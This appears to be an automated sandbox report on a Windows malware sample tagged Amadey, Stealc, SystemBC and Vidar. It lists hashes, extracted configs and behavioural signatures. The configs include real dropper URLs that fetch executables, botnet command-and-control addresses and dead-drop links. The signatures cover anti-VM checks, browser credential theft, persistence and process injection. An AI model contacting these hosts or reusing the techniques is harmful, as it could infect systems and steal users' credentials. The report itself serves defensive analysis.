amadey | 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a

Analysis

max time kernel
89s
max time network
150s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
06/03/2025, 05:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
Size

938KB
MD5

9ae9625a633b0cf08bc364845a4df9bb
SHA1

669645cd8a9a144f627efea57bd4c8c38b454a40
SHA256

4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
SHA512

4e64685031c59b302fcfc8af751e8ac426c3f0855bb32788c2684bb40d634c3147142023854748d63a819b62a72bd8034e5cffe2b5ec805fb4067bf65c8017a7
SSDEEP

24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8ayOF:nTvC/MTQYxsWR7ayO

Score

10^/10

amadey stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

systembc

towerbingobongoboom.com

62.60.226.86

Attributes

dns
5.132.191.104

Extracted

Family

stealc

Botnet

traff1

Attributes

url_path
/gtthfbsb2h.php

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/1548-766-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/1548-764-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rqrt.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2120	powershell.exe
67	2160	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2160	powershell.exe
3420	powershell.exe
2120	powershell.exe
1072	powershell.exe
1320	powershell.exe
3140	powershell.exe
3228	powershell.exe
3296	powershell.exe
772	powershell.exe
448	powershell.exe
1072	powershell.exe
1320	powershell.exe

Downloads MZ/PE file 33 IoCs

flow	pid	Process
4	2120	powershell.exe
11	1492	Gxtuum.exe
43	840	rapes.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
31	1712	rXOl0pp.exe
66	840	rapes.exe
66	840	rapes.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
70	1428	ILqcVeT.exe
67	2160	powershell.exe
7	840	rapes.exe
7	840	rapes.exe
7	840	rapes.exe
7	840	rapes.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
14	2000	ILqcVeT.exe
25	840	rapes.exe
25	840	rapes.exe

Uses browser remote debugging 2 TTPs 41 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
356	chrome.exe
348	chrome.exe
924	chrome.exe
780	chrome.exe
1704	chrome.exe
2644	chrome.exe
3204	chrome.exe
1752	chrome.exe
2428	chrome.exe
548	chrome.exe
2056	chrome.exe
2020	chrome.exe
1800	chrome.exe
1224	chrome.exe
1148	chrome.exe
668	chrome.exe
1928	chrome.exe
2580	chrome.exe
1836	chrome.exe
2704	chrome.exe
3312	chrome.exe
484	chrome.exe
2388	chrome.exe
3300	chrome.exe
1212	chrome.exe
2724	chrome.exe
2896	chrome.exe
1744	chrome.exe
2836	chrome.exe
308	chrome.exe
1756	chrome.exe
1716	chrome.exe
3800	chrome.exe
2844	chrome.exe
2744	chrome.exe
3844	chrome.exe
1116	chrome.exe
2688	chrome.exe
484	chrome.exe
3688	chrome.exe
2476	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000700000001cc75-746.dat	net_reactor
behavioral1/memory/1932-754-0x0000000000BA0000-0x0000000000C00000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rqrt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rqrt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe

Executes dropped EXE 22 IoCs

pid	Process
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
840	rapes.exe
2992	PcAIvJ0.exe
1948	nhDLtPT.exe
1492	Gxtuum.exe
2576	vertualiziren.exe
2000	ILqcVeT.exe
1712	rXOl0pp.exe
1108	zY9sqWs.exe
1968	PcAIvJ0.exe
1932	v6Oqdnc.exe
668	MCxU5Fj.exe
2108	MCxU5Fj.exe
2276	MCxU5Fj.exe
1932	mAtJWNv.exe
1548	mAtJWNv.exe
1156	FvbuInU.exe
2704	nhDLtPT.exe
1428	ILqcVeT.exe
932	65198a42c7.exe
1536	rqrt.exe
1684	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rqrt.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	vertualiziren.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	FvbuInU.exe

Loads dropped DLL 53 IoCs

pid	Process
2120	powershell.exe
2120	powershell.exe
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
840	rapes.exe
840	rapes.exe
840	rapes.exe
1948	nhDLtPT.exe
1492	Gxtuum.exe
1492	Gxtuum.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
2000	ILqcVeT.exe
2000	ILqcVeT.exe
840	rapes.exe
840	rapes.exe
2348	WerFault.exe
2348	WerFault.exe
2348	WerFault.exe
840	rapes.exe
668	MCxU5Fj.exe
668	MCxU5Fj.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
840	rapes.exe
840	rapes.exe
1932	mAtJWNv.exe
2828	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe
2512	WerFault.exe
2512	WerFault.exe
2512	WerFault.exe
2512	WerFault.exe
2512	WerFault.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
840	rapes.exe
1712	rXOl0pp.exe
1712	rXOl0pp.exe
840	rapes.exe
2160	powershell.exe
2160	powershell.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\65198a42c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\65198a42c7.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000a00000001d9cf-1137.dat	autoit_exe
behavioral1/files/0x000b000000012231-2307.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
840	rapes.exe
2576	vertualiziren.exe
2000	ILqcVeT.exe
1712	rXOl0pp.exe
1932	v6Oqdnc.exe
1156	FvbuInU.exe
1428	ILqcVeT.exe
1536	rqrt.exe
1684	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 668 set thread context of 2276	668	MCxU5Fj.exe	88
PID 1932 set thread context of 1548	1932	mAtJWNv.exe	102

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe
File created	C:\Windows\Tasks\Test Task17.job	vertualiziren.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
2348	1932	WerFault.exe	84
1924	668	WerFault.exe	86
2828	1932	WerFault.exe	101
2512	2276	WerFault.exe	88
2112	3636	WerFault.exe	178
3376	608	WerFault.exe	189
2536	1748	WerFault.exe	223

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rqrt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	65198a42c7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2112	timeout.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1044	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2248	schtasks.exe
2864	schtasks.exe
3360	schtasks.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
840	rapes.exe
1072	powershell.exe
1072	powershell.exe
1072	powershell.exe
772	powershell.exe
2576	vertualiziren.exe
2000	ILqcVeT.exe
2000	ILqcVeT.exe
2000	ILqcVeT.exe
2704	chrome.exe
2704	chrome.exe
1712	rXOl0pp.exe
2000	ILqcVeT.exe
2000	ILqcVeT.exe
2724	chrome.exe
2724	chrome.exe
2000	ILqcVeT.exe
1320	powershell.exe
1320	powershell.exe
1320	powershell.exe
448	powershell.exe
2000	ILqcVeT.exe
1932	v6Oqdnc.exe
1712	rXOl0pp.exe
1712	rXOl0pp.exe
2896	chrome.exe
2896	chrome.exe
1712	rXOl0pp.exe
1712	rXOl0pp.exe
1744	chrome.exe
1744	chrome.exe
1712	rXOl0pp.exe
1712	rXOl0pp.exe
2836	chrome.exe
2836	chrome.exe
1156	FvbuInU.exe
1712	rXOl0pp.exe
1428	ILqcVeT.exe
1712	rXOl0pp.exe
2160	powershell.exe
1536	rqrt.exe
1428	ILqcVeT.exe
2160	powershell.exe
2160	powershell.exe
1684	Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE
1428	ILqcVeT.exe
1148	chrome.exe
1148	chrome.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2704	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeShutdownPrivilege	2724	chrome.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	2896	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	1744	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeShutdownPrivilege	2836	chrome.exe
Token: SeDebugPrivilege	2160	powershell.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
1948	nhDLtPT.exe
2704	chrome.exe
2724	chrome.exe
2896	chrome.exe
1744	chrome.exe
2836	chrome.exe
932	65198a42c7.exe
932	65198a42c7.exe
932	65198a42c7.exe
1148	chrome.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
932	65198a42c7.exe
932	65198a42c7.exe
932	65198a42c7.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 608	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	30
PID 1704 wrote to memory of 608	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	30
PID 1704 wrote to memory of 608	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	30
PID 1704 wrote to memory of 608	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	30
PID 1704 wrote to memory of 2404	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	31
PID 1704 wrote to memory of 2404	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	31
PID 1704 wrote to memory of 2404	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	31
PID 1704 wrote to memory of 2404	1704	4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe	31
PID 608 wrote to memory of 2248	608	cmd.exe	33
PID 608 wrote to memory of 2248	608	cmd.exe	33
PID 608 wrote to memory of 2248	608	cmd.exe	33
PID 608 wrote to memory of 2248	608	cmd.exe	33
PID 2404 wrote to memory of 2120	2404	mshta.exe	34
PID 2404 wrote to memory of 2120	2404	mshta.exe	34
PID 2404 wrote to memory of 2120	2404	mshta.exe	34
PID 2404 wrote to memory of 2120	2404	mshta.exe	34
